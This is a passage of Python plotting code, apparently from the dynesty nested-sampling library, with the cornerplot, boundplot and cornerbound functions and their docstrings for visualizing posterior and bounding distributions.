fig.subplots_adjust(left=lb,
bottom=lb,
right=tr,
top=tr,
wspace=whspace,
hspace=whspace)
# Plot the 2-D projected samples.
for i, x in enumerate(samples[1:]):
for j, y in enumerate(samples[:-1]):
try:
ax = axes[i, j]
except:
ax = axes
# Setup axes.
if span is not None:
ax.set_xlim(span[j])
ax.set_ylim(span[i])
if j > i:
ax.set_frame_on(False)
ax.set_xticks([])
ax.set_yticks([])
continue
if max_n_ticks == 0:
ax.xaxis.set_major_locator(NullLocator())
ax.yaxis.set_major_locator(NullLocator())
else:
ax.xaxis.set_major_locator(
MaxNLocator(max_n_ticks, prune="lower"))
ax.yaxis.set_major_locator(
MaxNLocator(max_n_ticks, prune="lower"))
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
ax.xaxis.set_major_formatter(sf)
ax.yaxis.set_major_formatter(sf)
if i < ndim - 2:
ax.set_xticklabels([])
else:
[l.set_rotation(45) for l in ax.get_xticklabels()]
ax.set_xlabel(labels[j], **label_kwargs)
ax.xaxis.set_label_coords(0.5, -0.3)
if j > 0:
ax.set_yticklabels([])
else:
[l.set_rotation(45) for l in ax.get_yticklabels()]
ax.set_ylabel(labels[i + 1], **label_kwargs)
ax.yaxis.set_label_coords(-0.3, 0.5)
# Plot distribution.
in_bounds = np.ones_like(y).astype('bool')
if span is not None and span[i] is not None:
in_bounds *= ((x >= span[i][0]) & (x <= span[i][1]))
if span is not None and span[j] is not None:
in_bounds *= ((y >= span[j][0]) & (y <= span[j][1]))
if isinstance(color, str):
cur_color = color
else:
cur_color = color[in_bounds][::thin]
ax.scatter(y[in_bounds][::thin],
x[in_bounds][::thin],
c=cur_color,
cmap=cmap,
**plot_kwargs)
# Add truth values
if truths is not None:
if truths[j] is not None:
try:
[
ax.axvline(t, color=truth_color, **truth_kwargs)
for t in truths[j]
]
except:
ax.axvline(truths[j],
color=truth_color,
**truth_kwargs)
if truths[i + 1] is not None:
try:
[
ax.axhline(t, color=truth_color, **truth_kwargs)
for t in truths[i + 1]
]
except:
ax.axhline(truths[i + 1],
color=truth_color,
**truth_kwargs)
return (fig, axes)
def cornerplot(results,
dims=None,
span=None,
quantiles=[0.025, 0.5, 0.975],
color='black',
smooth=0.02,
quantiles_2d=None,
hist_kwargs=None,
hist2d_kwargs=None,
labels=None,
label_kwargs=None,
show_titles=False,
title_quantiles=[0.025, 0.5, 0.975],
title_fmt=".2f",
title_kwargs=None,
truths=None,
truth_color='red',
truth_kwargs=None,
max_n_ticks=5,
top_ticks=False,
use_math_text=False,
verbose=False,
fig=None):
"""
Generate a corner plot of the 1-D and 2-D marginalized posteriors.
Parameters
----------
results : :class:`~dynesty.results.Results` instance
A :class:`~dynesty.results.Results` instance from a nested
sampling run. **Compatible with results derived from**
`nestle <http://kylebarbary.com/nestle/>`_.
dims : iterable of shape (ndim,), optional
The subset of dimensions that should be plotted. If not provided,
all dimensions will be shown.
span : iterable with shape (ndim,), optional
A list where each element is either a length-2 tuple containing
lower and upper bounds or a float from `(0., 1.]` giving the
fraction of (weighted) samples to include. If a fraction is provided,
the bounds are chosen to be equal-tailed. An example would be::
span = [(0., 10.), 0.95, (5., 6.)]
Default is `0.999999426697` (5-sigma credible interval).
quantiles : iterable, optional
A list of fractional quantiles to overplot on the 1-D marginalized
posteriors as vertical dashed lines. Default is `[0.025, 0.5, 0.975]`
(spanning the 95%/2-sigma credible interval).
color : str or iterable with shape (ndim,), optional
A `~matplotlib`-style color (either a single color or a different
value for each subplot) used when plotting the histograms.
Default is `'black'`.
smooth : float or iterable with shape (ndim,), optional
The standard deviation (either a single value or a different value for
each subplot) for the Gaussian kernel used to smooth the 1-D and 2-D
marginalized posteriors, expressed as a fraction of the span.
Default is `0.02` (2% smoothing). If an integer is provided instead,
this will instead default to a simple (weighted) histogram with
`bins=smooth`.
quantiles_2d : iterable with shape (nquant,), optional
The quantiles used for plotting the smoothed 2-D distributions.
If not provided, these default to 0.5, 1, 1.5, and 2-sigma contours
roughly corresponding to quantiles of `[0.1, 0.4, 0.65, 0.85]`.
hist_kwargs : dict, optional
Extra keyword arguments to send to the 1-D (smoothed) histograms.
hist2d_kwargs : dict, optional
Extra keyword arguments to send to the 2-D (smoothed) histograms.
labels : iterable with shape (ndim,), optional
A list of names for each parameter. If not provided, the default name
used when plotting will follow :math:`x_i` style.
label_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_xlabel` and
`~matplotlib.axes.Axes.set_ylabel` methods.
show_titles : bool, optional
Whether to display a title above each 1-D marginalized posterior
showing the 0.5 quantile along with the upper/lower bounds associated
with the 0.025 and 0.975 (95%/2-sigma credible interval) quantiles.
Default is `False`.
title_quantiles : iterable, optional
A list of fractional quantiles to use in the title. Default is
`[0.025, 0.5, 0.975]` (median plus 95%/2-sigma credible interval).
title_fmt : str, optional
The format string for the quantiles provided in the title. Default is
`'.2f'`.
title_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_title` command.
truths : iterable with shape (ndim,), optional
A list of reference values that will be overplotted on the traces and
marginalized 1-D posteriors as solid horizontal/vertical lines.
Individual values can be exempt using `None`. Default is `None`.
truth_color : str or iterable with shape (ndim,), optional
A `~matplotlib`-style color (either a single color or a different
value for each subplot) used when plotting `truths`.
Default is `'red'`.
truth_kwargs : dict, optional
Extra keyword arguments that will be used for plotting the vertical
and horizontal lines with `truths`.
max_n_ticks : int, optional
Maximum number of ticks allowed. Default is `5`.
top_ticks : bool, optional
Whether to label the top (rather than bottom) ticks. Default is
`False`.
use_math_text : bool, optional
Whether the axis tick labels for very large/small exponents should be
displayed as powers of 10 rather than using `e`. Default is `False`.
verbose : bool, optional
Whether to print the values of the computed quantiles associated with
each parameter. Default is `False`.
fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
If provided, overplot the traces and marginalized 1-D posteriors
onto the provided figure. Otherwise, by default an
internal figure is generated.
Returns
-------
cornerplot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
Output corner plot.
"""
# Initialize values.
if quantiles is None:
quantiles = []
if truth_kwargs is None:
truth_kwargs = dict()
if label_kwargs is None:
label_kwargs = dict()
if title_kwargs is None:
title_kwargs = dict()
if hist_kwargs is None:
hist_kwargs = dict()
if hist2d_kwargs is None:
hist2d_kwargs = dict()
# Set defaults.
hist_kwargs['alpha'] = hist_kwargs.get('alpha', 0.6)
hist2d_kwargs['alpha'] = hist2d_kwargs.get('alpha', 0.6)
hist2d_kwargs['levels'] = hist2d_kwargs.get('levels', quantiles_2d)
truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 2)
truth_kwargs['alpha'] = truth_kwargs.get('alpha', 0.7)
# Extract weighted samples.
samples = results['samples']
try:
weights = np.exp(results['logwt'] - results['logz'][-1])
except:
weights = results['weights']
# Deal with 1D results. A number of extra catches are also here
# in case users are trying to plot other results besides the `Results`
# instance generated by `dynesty`.
samples = np.atleast_1d(samples)
if len(samples.shape) == 1:
samples = np.atleast_2d(samples)
else:
assert len(samples.shape) == 2, "Samples must be 1- or 2-D."
samples = samples.T
assert samples.shape[0] <= samples.shape[1], "There are more " \
"dimensions than samples!"
# Slice samples based on provided `dims`.
if dims is not None:
samples = samples[dims]
ndim, nsamps = samples.shape
# Check weights.
if weights.ndim != 1:
raise ValueError("Weights must be 1-D.")
if nsamps != weights.shape[0]:
raise ValueError("The number of weights and samples disagree!")
# Determine plotting bounds.
if span is None:
span = [0.999999426697 for i in range(ndim)]
span = list(span)
if len(span) != ndim:
raise ValueError("Dimension mismatch between samples and span.")
for i, _ in enumerate(span):
try:
xmin, xmax = span[i]
except:
q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
span[i] = _quantile(samples[i], q, weights=weights)
# Set labels
if labels is None:
labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
# Setting up smoothing.
if (isinstance(smooth, int_type) or isinstance(smooth, float_type)):
smooth = [smooth for i in range(ndim)]
# Setup axis layout (from `corner.py`).
factor = 2.0 # size of side of one panel
lbdim = 0.5 * factor # size of left/bottom margin
trdim = 0.2 * factor # size of top/right margin
whspace = 0.05 # size of width/height margin
plotdim = factor * ndim + factor * (ndim - 1.) * whspace # plot size
dim = lbdim + plotdim + trdim # total size
# Initialize figure.
fig, axes = _make_subplots(fig, ndim, ndim, dim, dim)
# Format figure.
lb = lbdim / dim
tr = (lbdim + plotdim) / dim
fig.subplots_adjust(left=lb,
bottom=lb,
right=tr,
top=tr,
wspace=whspace,
hspace=whspace)
# Plotting.
for i, x in enumerate(samples):
if np.shape(samples)[0] == 1:
ax = axes
else:
ax = axes[i, i]
# Plot the 1-D marginalized posteriors.
# Setup axes
ax.set_xlim(span[i])
if max_n_ticks == 0:
ax.xaxis.set_major_locator(NullLocator())
ax.yaxis.set_major_locator(NullLocator())
else:
ax.xaxis.set_major_locator(MaxNLocator(max_n_ticks, prune="lower"))
ax.yaxis.set_major_locator(NullLocator())
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
ax.xaxis.set_major_formatter(sf)
if i < ndim - 1:
if top_ticks:
ax.xaxis.set_ticks_position("top")
[l.set_rotation(45) for l in ax.get_xticklabels()]
else:
ax.set_xticklabels([])
else:
[l.set_rotation(45) for l in ax.get_xticklabels()]
ax.set_xlabel(labels[i], **label_kwargs)
ax.xaxis.set_label_coords(0.5, -0.3)
# Generate distribution.
sx = smooth[i]
if isinstance(sx, int_type):
# If `sx` is an integer, plot a weighted histogram with
# `sx` bins within the provided bounds.
n, b, _ = ax.hist(x,
bins=sx,
weights=weights,
color=color,
range=np.sort(span[i]),
**hist_kwargs)
else:
# If `sx` is a float, oversample the data relative to the
# smoothing filter by a factor of 10, then use a Gaussian
# filter to smooth the results.
bins = int(round(10. / sx))
n, b = np.histogram(x,
bins=bins,
weights=weights,
range=np.sort(span[i]))
n = norm_kde(n, 10.)
b0 = 0.5 * (b[1:] + b[:-1])
n, b, _ = ax.hist(b0,
bins=b,
weights=n,
range=np.sort(span[i]),
color=color,
**hist_kwargs)
ax.set_ylim([0., max(n) * 1.05])
# Plot quantiles.
if quantiles is not None and len(quantiles) > 0:
qs = _quantile(x, quantiles, weights=weights)
for q in qs:
ax.axvline(q, lw=2, ls="dashed", color=color)
if verbose:
print("Quantiles:")
print(labels[i], [blob for blob in zip(quantiles, qs)])
# Add truth value(s).
if truths is not None and truths[i] is not None:
try:
[
ax.axvline(t, color=truth_color, **truth_kwargs)
for t in truths[i]
]
except:
ax.axvline(truths[i], color=truth_color, **truth_kwargs)
# Set titles.
if show_titles:
title = None
if title_fmt is not None:
ql, qm, qh = _quantile(x, title_quantiles, weights=weights)
q_minus, q_plus = qm - ql, qh - qm
fmt = "{{0:{0}}}".format(title_fmt).format
title = r"${{{0}}}_{{-{1}}}^{{+{2}}}$"
title = title.format(fmt(qm), fmt(q_minus), fmt(q_plus))
title = "{0} = {1}".format(labels[i], title)
ax.set_title(title, **title_kwargs)
for j, y in enumerate(samples):
if np.shape(samples)[0] == 1:
ax = axes
else:
ax = axes[i, j]
# Plot the 2-D marginalized posteriors.
# Setup axes.
if j > i:
ax.set_frame_on(False)
ax.set_xticks([])
ax.set_yticks([])
continue
elif j == i:
continue
if max_n_ticks == 0:
ax.xaxis.set_major_locator(NullLocator())
ax.yaxis.set_major_locator(NullLocator())
else:
ax.xaxis.set_major_locator(
MaxNLocator(max_n_ticks, prune="lower"))
ax.yaxis.set_major_locator(
MaxNLocator(max_n_ticks, prune="lower"))
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
ax.xaxis.set_major_formatter(sf)
ax.yaxis.set_major_formatter(sf)
if i < ndim - 1:
ax.set_xticklabels([])
else:
[l.set_rotation(45) for l in ax.get_xticklabels()]
ax.set_xlabel(labels[j], **label_kwargs)
ax.xaxis.set_label_coords(0.5, -0.3)
if j > 0:
ax.set_yticklabels([])
else:
[l.set_rotation(45) for l in ax.get_yticklabels()]
ax.set_ylabel(labels[i], **label_kwargs)
ax.yaxis.set_label_coords(-0.3, 0.5)
# Generate distribution.
sy = smooth[j]
check_ix = isinstance(sx, int_type)
check_iy = isinstance(sy, int_type)
if check_ix and check_iy:
fill_contours = False
plot_contours = False
else:
fill_contours = True
plot_contours = True
hist2d_kwargs['fill_contours'] = hist2d_kwargs.get(
'fill_contours', fill_contours)
hist2d_kwargs['plot_contours'] = hist2d_kwargs.get(
'plot_contours', plot_contours)
_hist2d(y,
x,
ax=ax,
span=[span[j], span[i]],
weights=weights,
color=color,
smooth=[sy, sx],
**hist2d_kwargs)
# Add truth values
if truths is not None:
if truths[j] is not None:
try:
[
ax.axvline(t, color=truth_color, **truth_kwargs)
for t in truths[j]
]
except:
ax.axvline(truths[j],
color=truth_color,
**truth_kwargs)
if truths[i] is not None:
try:
[
ax.axhline(t, color=truth_color, **truth_kwargs)
for t in truths[i]
]
except:
ax.axhline(truths[i],
color=truth_color,
**truth_kwargs)
return (fig, axes)
def boundplot(results,
dims,
it=None,
idx=None,
prior_transform=None,
periodic=None,
reflective=None,
ndraws=5000,
color='gray',
plot_kwargs=None,
labels=None,
label_kwargs=None,
max_n_ticks=5,
use_math_text=False,
show_live=False,
live_color='darkviolet',
live_kwargs=None,
span=None,
fig=None):
"""
Return the bounding distribution used to propose either (1) live points
at a given iteration or (2) a specific dead point during
the course of a run, projected onto the two dimensions specified
by `dims`.
Parameters
----------
results : :class:`~dynesty.results.Results` instance
A :class:`~dynesty.results.Results` instance from a nested
sampling run.
dims : length-2 tuple
The dimensions used to plot the bounding.
it : int, optional
If provided, returns the bounding distribution at the specified
iteration of the nested sampling run. **Note that this option and
`idx` are mutually exclusive.**
idx : int, optional
If provided, returns the bounding distribution used to propose the
dead point at the specified iteration of the nested sampling run.
**Note that this option and `it` are mutually exclusive.**
prior_transform : func, optional
The function transforming samples within the unit cube back to samples
in the native model space. If provided, the transformed bounding
distribution will be plotted in the native model space.
periodic : iterable, optional
A list of indices for parameters with periodic boundary conditions.
These parameters *will not* have their positions constrained to be
within the unit cube, enabling smooth behavior for parameters
that may wrap around the edge. Default is `None` (i.e. no periodic
boundary conditions).
reflective : iterable, optional
A list of indices for parameters with reflective boundary conditions.
These parameters *will not* have their positions constrained to be
within the unit cube, enabling smooth behavior for parameters
that may reflect at the edge. Default is `None` (i.e. no reflective
boundary conditions).
ndraws : int, optional
The number of random samples to draw from the bounding distribution
when plotting. Default is `5000`.
color : str, optional
The color of the points randomly sampled from the bounding
distribution. Default is `'gray'`.
plot_kwargs : dict, optional
Extra keyword arguments used when plotting the bounding draws.
labels : iterable with shape (ndim,), optional
A list of names for each parameter. If not provided, the default name
used when plotting will follow :math:`x_i` style.
label_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_xlabel` and
`~matplotlib.axes.Axes.set_ylabel` methods.
max_n_ticks : int, optional
Maximum number of ticks allowed. Default is `5`.
use_math_text : bool, optional
Whether the axis tick labels for very large/small exponents should be
displayed as powers of 10 rather than using `e`. Default is `False`.
show_live : bool, optional
Whether the live points at a given iteration (for `it`) or
associated with the bounding (for `idx`) should be highlighted.
Default is `False`. In the dynamic case, only the live points
associated with the batch used to construct the relevant bound
are plotted.
live_color : str, optional
The color of the live points. Default is `'darkviolet'`.
live_kwargs : dict, optional
Extra keyword arguments used when plotting the live points.
span : iterable with shape (2,), optional
A list where each element is a length-2 tuple containing
lower and upper bounds. Default is `None` (no bound).
fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
If provided, overplot the draws onto the provided figure.
Otherwise, by default an internal figure is generated.
Returns
-------
bounding_plot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
Output plot of the bounding distribution.
"""
# Initialize values.
if plot_kwargs is None:
plot_kwargs = dict()
if label_kwargs is None:
label_kwargs = dict()
if live_kwargs is None:
live_kwargs = dict()
# Check that either `idx` or `it` has been specified.
if (it is None and idx is None) or (it is not None and idx is not None):
raise ValueError("You must specify either an iteration or an index!")
# Set defaults.
plot_kwargs['marker'] = plot_kwargs.get('marker', 'o')
plot_kwargs['linestyle'] = plot_kwargs.get('linestyle', 'None')
plot_kwargs['markersize'] = plot_kwargs.get('markersize', 1)
plot_kwargs['alpha'] = plot_kwargs.get('alpha', 0.4)
live_kwargs['marker'] = live_kwargs.get('marker', 'o')
live_kwargs['linestyle'] = live_kwargs.get('linestyle', 'None')
live_kwargs['markersize'] = live_kwargs.get('markersize', 1)
# Extract bounding distributions.
try:
bounds = results['bound']
except KeyError:
raise ValueError("No bounds were saved in the results!")
nsamps = len(results['samples'])
nonbounded = get_nonbounded(bounds[0].n, periodic, reflective)
if it is not None:
if it >= nsamps:
raise ValueError("The iteration requested goes beyond the "
"number of iterations in the run.")
# Extract bound iterations.
try:
bound_iter = np.array(results['bound_iter'])
except:
raise ValueError("Cannot reconstruct the bound used at the "
"specified iteration since bound "
"iterations were not saved in the results.")
# Find bound at the specified iteration.
if it == 0:
pidx = 0
else:
pidx = bound_iter[it]
else:
if idx >= nsamps:
raise ValueError("The index requested goes beyond the "
"number of samples in the run.")
try:
samples_bound = results['samples_bound']
except:
raise ValueError("Cannot reconstruct the bound used to "
"compute the specified dead point since "
"sample bound indices were not saved "
"in the results.")
# Grab relevant bound.
pidx = samples_bound[idx]
# Get desired bound.
bound = bounds[pidx]
# Do we want to show the live points at the specified iteration?
# If so, we need to rewind our bound to check.
# (We could also go forward; this is an arbitrary choice.)
if show_live:
try:
# We can only reconstruct the run if the final set of live points
# were added to the results. This is true by default for dynamic
# nested sampling runs but not guaranteeed for standard runs.
nlive = results['nlive']
niter = results['niter']
if nsamps - niter != nlive:
raise ValueError("Cannot reconstruct bound because the "
"final set of live points are not included "
"in the results.")
# Grab our final set of live points (with proper IDs).
samples = results['samples_u']
samples_id = results['samples_id']
ndim = samples.shape[1]
live_u = np.empty((nlive, ndim))
live_u[samples_id[-nlive:]] = samples[-nlive:]
# Find generating bound ID if necessary.
if it is None:
it = results['samples_it'][idx]
# Run our sampling backwards.
for i in range(1, niter - it + 1):
r = -(nlive + i)
uidx = samples_id[r]
live_u[uidx] = samples[r]
except:
# In the dynamic sampling case, we will show the live points used
# during the batch associated with a particular iteration/bound.
batch = results['samples_batch'][it] # select batch
nbatch = results['batch_nlive'][batch] # nlive in the batch
bsel = results['samples_batch'] == batch # select batch
niter_eff = sum(bsel) - nbatch # "effective" iterations in batch
# Grab our final set of live points (with proper IDs).
samples = results['samples_u'][bsel]
samples_id = results['samples_id'][bsel]
samples_id -= min(samples_id) # re-index to start at zero
ndim = samples.shape[1]
live_u = np.empty((nbatch, ndim))
live_u[samples_id[-nbatch:]] = samples[-nbatch:]
# Find generating bound ID if necessary.
if it is None:
it = results['samples_it'][idx]
it_eff = sum(bsel[:it + 1]) # effective iteration in batch
# Run our sampling backwards.
for i in range(1, niter_eff - it_eff + 1):
r = -(nbatch + i)
uidx = samples_id[r]
live_u[uidx] = samples[r]
rstate = get_random_generator()
# Draw samples from the bounding distribution.
if not isinstance(bound, bounding.RadFriends) and not isinstance(
bound, bounding.SupFriends):
# If bound is "fixed", go ahead and draw samples from it.
psamps = bound.samples(ndraws, rstate=rstate)
else:
# If bound is based on the distribution of live points at a
# specific iteration, we need to reconstruct what those were.
if not show_live:
try:
# Only reconstruct the run if we haven't done it already.
nlive = results['nlive']
niter = results['niter']
if nsamps - niter != nlive:
raise ValueError("Cannot reconstruct bound because the "
"final set of live points are not "
"included in the results.")
# Grab our final set of live points (with proper IDs).
samples = results['samples_u']
samples_id = results['samples_id']
ndim = samples.shape[1]
live_u = np.empty((nlive, ndim))
live_u[samples_id[-nlive:]] = samples[-nlive:]
# Run our sampling backwards.
if it is None:
it = results['samples_it'][idx]
for i in range(1, niter - it + 1):
r = -(nlive + i)
uidx = samples_id[r]
live_u[uidx] = samples[r]
except:
raise ValueError("Live point tracking currently not "
"implemented for dynamic sampling results.")
# Draw samples.
psamps = bound.samples(ndraws, live_u, rstate=rstate)
# Projecting samples to input dimensions and possibly
# the native model space.
if prior_transform is None:
x1, x2 = psamps[:, dims].T
if show_live:
l1, l2 = live_u[:, dims].T
else:
# Remove points outside of the unit cube as appropriate.
sel = [unitcheck(point, nonbounded) for point in psamps]
vsamps = np.array(list(map(prior_transform, psamps[sel])))
x1, x2 = vsamps[:, dims].T
if show_live:
lsamps = np.array(list(map(prior_transform, live_u)))
l1, l2 = lsamps[:, dims].T
# Setting up default plot layout.
fig, axes = _make_subplots(fig, 1, 1, 6, 6)
axes = axes[0, 0]
# Plotting.
axes.plot(x1, x2, color=color, zorder=1, **plot_kwargs)
if show_live:
axes.plot(l1, l2, color=live_color, zorder=2, **live_kwargs)
# Setup axes
if span is not None:
axes.set_xlim(span[0])
axes.set_ylim(span[1])
if max_n_ticks == 0:
axes.xaxis.set_major_locator(NullLocator())
axes.yaxis.set_major_locator(NullLocator())
else:
axes.xaxis.set_major_locator(MaxNLocator(max_n_ticks))
axes.yaxis.set_major_locator(MaxNLocator(max_n_ticks))
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
axes.xaxis.set_major_formatter(sf)
axes.yaxis.set_major_formatter(sf)
if labels is not None:
axes.set_xlabel(labels[0], **label_kwargs)
axes.set_ylabel(labels[1], **label_kwargs)
else:
axes.set_xlabel(r"$x_{" + str(dims[0] + 1) + "}$", **label_kwargs)
axes.set_ylabel(r"$x_{" + str(dims[1] + 1) + "}$", **label_kwargs)
return fig, axes
def cornerbound(results,
it=None,
idx=None,
dims=None,
prior_transform=None,
periodic=None,
reflective=None,
ndraws=5000,
color='gray',
plot_kwargs=None,
labels=None,
label_kwargs=None,
max_n_ticks=5,
use_math_text=False,
show_live=False,
live_color='darkviolet',
live_kwargs=None,
span=None,
fig=None):
"""
Return the bounding distribution used to propose either (1) live points
at a given iteration or (2) a specific dead point during
the course of a run, projected onto all pairs of dimensions.
Parameters
----------
results : :class:`~dynesty.results.Results` instance
A :class:`~dynesty.results.Results` instance from a nested
sampling run.
it : int, optional
If provided, returns the bounding distribution at the specified
iteration of the nested sampling run. **Note that this option and
`idx` are mutually exclusive.**
idx : int, optional
If provided, returns the bounding distribution used to propose the
dead point at the specified iteration of the nested sampling run.
**Note that this option and `it` are mutually exclusive.**
dims : iterable of shape (ndim,), optional
The subset of dimensions that should be plotted. If not provided,
all dimensions will be shown.
prior_transform : func, optional
The function transforming samples within the unit cube back to samples
in the native model space. If provided, the transformed bounding
distribution will be plotted in the native model space.
periodic : iterable, optional
A list of indices for parameters with periodic boundary conditions.
These parameters *will not* have their positions constrained to be
within the unit cube, enabling smooth behavior for parameters
that may wrap around the edge. Default is `None` (i.e. no periodic
boundary conditions).
reflective : iterable, optional
A list of indices for parameters with reflective boundary conditions.
These parameters *will not* have their positions constrained to be
within the unit cube, enabling smooth behavior for parameters
that may reflect at the edge. Default is `None` (i.e. no reflective
boundary conditions).
ndraws : int, optional
The number of random samples to draw from the bounding distribution
when plotting. Default is `5000`.
color : str, optional
The color of the points randomly sampled from the bounding
distribution. Default is `'gray'`.
plot_kwargs : dict, optional
Extra keyword arguments used when plotting the bounding draws.
labels : iterable with shape (ndim,), optional
A list of names for each parameter. If not provided, the default name
used when plotting will be in :math:`x_i` style.
label_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_xlabel` and
`~matplotlib.axes.Axes.set_ylabel` methods.
max_n_ticks : int, optional
Maximum number of ticks allowed. Default is `5`.
use_math_text : bool, optional
Whether the axis tick labels for very large/small exponents should be
displayed as powers of 10 rather than using `e`. Default is `False`.
show_live : bool, optional
Whether the live points at a given iteration (for `it`) or
associated with the bounding (for `idx`) should be highlighted.
Default is `False`. In the dynamic case, only the live points
associated with the batch used to construct the relevant bound
are plotted.
live_color : str, optional
The color of the live points. Default is `'darkviolet'`.
live_kwargs : dict, optional
Extra keyword arguments used when plotting the live points.
span : iterable with shape (2,), optional
A list where each element is a length-2 tuple containing
lower and upper bounds. Default is `None` (no bound).
fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
If provided, overplot the draws onto the provided figure.
Otherwise, by default an internal figure is generated.
Returns
-------
cornerbound : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
Output corner plot of the bounding distribution.
"""
# Initialize values.
if label_kwargs is None:
label_kwargs = dict()
if plot_kwargs is None:
plot_kwargs = dict()
if live_kwargs is None:
live_kwargs = dict()
# Check that either `idx` or `it` is specified.
if (it is None and idx is None) or (it is not None and idx is not None):
raise ValueError("You must specify either an iteration or an index!")
# Set defaults.
plot_kwargs['marker'] = plot_kwargs.get('marker', 'o')
plot_kwargs['linestyle'] = plot_kwargs.get('linestyle', 'None')
plot_kwargs['markersize'] = plot_kwargs.get('markersize', 1)
plot_kwargs['alpha'] = plot_kwargs.get('alpha', 0.4)
live_kwargs['marker'] = live_kwargs.get('marker', 'o')
live_kwargs['linestyle'] = live_kwargs.get('linestyle', 'None')
live_kwargs['markersize'] = live_kwargs.get('markersize', 1)
# Extract bounding distributions.
try:
bounds = results['bound']
except KeyError:
raise ValueError("No bounds were saved in the results!")
nsamps = len(results['samples'])
nonbounded = get_nonbounded(bounds[0].n, periodic, reflective)
if it is not None:
if it >= nsamps:
raise ValueError("The iteration requested goes beyond the "
"number of iterations in the run.")
# Extract bound iterations.
try:
bound_iter = np.array(results['bound_iter'])
except KeyError:
raise ValueError("Cannot reconstruct the bound used at the "
"specified iteration since bound "
"iterations were not saved in the results.")
# Find bound at the specified iteration.
if it == 0:
pidx = 0
else:
pidx = bound_iter[it]
else:
if idx >= nsamps:
raise ValueError("The index requested goes beyond the "
"number of samples in the run.")
try:
samples_bound = results['samples_bound']
except:
raise ValueError("Cannot reconstruct the bound used to "
"compute the specified dead point since "
"sample bound indices were not saved "
"in the results.")
# Grab relevant bound.
pidx = samples_bound[idx]
# Get desired bound.
bound = bounds[pidx]
# Do we want to show the live points at the specified iteration?
# If so, we need to rewind our bound to check.
# (We could also go forward; this is an arbitrary choice.)
if show_live:
try:
# We can only reconstruct the run if the final set of live points
# were added to the results. This is true by default for dynamic
# nested sampling runs but not guaranteeed for standard runs.
nlive = results['nlive']
niter = results['niter']
if nsamps - niter != nlive:
raise ValueError("Cannot reconstruct bound because the "
"final set of live points are not included "
"in the results.")
# Grab our final set of live points (with proper IDs).
samples = results['samples_u']
samples_id = results['samples_id']
ndim = samples.shape[1]
live_u = np.empty((nlive, ndim))
live_u[samples_id[-nlive:]] = samples[-nlive:]
# Find generating bound ID if necessary.
if it is None:
it = results['samples_it'][idx]
# Run our sampling backwards.
for i in range(1, niter - it + 1):
r = -(nlive + i)
uidx = samples_id[r]
live_u[uidx] = samples[r]
except:
# In the dynamic sampling case, we will show the live points used
# during the batch associated with a particular iteration/bound.
if it is not None:
batch = results['samples_batch'][it] # select batch
else:
batch = results['samples_batch'][idx]
nbatch = results['batch_nlive'][batch] # nlive in the batch
bsel = results['samples_batch'] == batch # select batch
niter_eff = sum(bsel) - nbatch # "effective" iterations in batch
# Grab our final set of live points (with proper IDs).
samples = results['samples_u'][bsel]
samples_id = results['samples_id'][bsel]
samples_id -= min(samples_id) # re-index to start at zero
ndim = samples.shape[1]
live_u = np.empty((nbatch, ndim))
live_u[samples_id[-nbatch:]] = samples[-nbatch:]
# Find generating bound ID if necessary.
if it is None:
it = results['samples_it'][idx]
it_eff = sum(bsel[:it + 1]) # effective iteration in batch
# Run our sampling backwards.
for i in range(1, niter_eff - it_eff + 1):
r = -(nbatch + i)
uidx = samples_id[r]
live_u[uidx] = samples[r]
rstate = get_random_generator()
# Draw samples from the bounding distribution.
try:
# If bound is "fixed", go ahead and draw samples from it.
psamps = bound.samples(ndraws, rstate=rstate)
except:
# If bound is based on the distribution of live points at a
# specific iteration, we need to reconstruct what those were.
if not show_live:
# Only reconstruct the run if we haven't done it already.
nlive = results['nlive']
niter = results['niter']
if nsamps - niter != nlive:
raise ValueError("Cannot reconstruct bound because the "
"final set of live points are not included "
"in the results.")
# Grab our final set of live points (with proper IDs).
samples = results['samples_u']
samples_id = results['samples_id']
ndim = samples.shape[1]
live_u = np.empty((nlive, ndim))
live_u[samples_id[-nlive:]] = samples[-nlive:]
# Run our sampling backwards.
if it is None:
it = results['samples_it'][idx]
for i in range(1, niter - it + 1):
r = -(nlive + i)
uidx = samples_id[r]
live_u[uidx] = samples[r]
# Draw samples.
psamps = bound.samples(ndraws, live_u, rstate=rstate)
# Projecting samples to input dimensions and possibly
# the native model space.
if prior_transform is None:
psamps = psamps.T
if show_live:
lsamps = live_u.T
else:
# Remove points outside of the unit cube.
sel = [unitcheck(point, nonbounded) for point in psamps]
psamps = np.array(list(map(prior_transform, psamps[sel])))
psamps = psamps.T
if show_live:
lsamps = np.array(list(map(prior_transform, live_u)))
lsamps = lsamps.T
# Subsample dimensions.
if dims is not None:
psamps = psamps[dims]
if show_live:
lsamps = lsamps[dims]
ndim = psamps.shape[0]
# Set labels.
if labels is None:
labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
# Setup axis layout (from `corner.py`).
factor = 2.0 # size of side of one panel
lbdim = 0.5 * factor # size of left/bottom margin
trdim = 0.2 * factor # size of top/right margin
whspace = 0.05 # size of width/height margin
plotdim = factor * (ndim - 1.) + factor * (ndim - 2.) * whspace
dim = lbdim + plotdim + trdim # total size
# Initialize figure.
fig, axes = _make_subplots(fig, ndim - 1, ndim - 1, dim, dim)
# Format figure.
lb = lbdim / dim
tr = (lbdim + plotdim) / dim
fig.subplots_adjust(left=lb,
bottom=lb,
right=tr,
top=tr,
wspace=whspace,
hspace=whspace)
# Plot the 2-D projected samples.
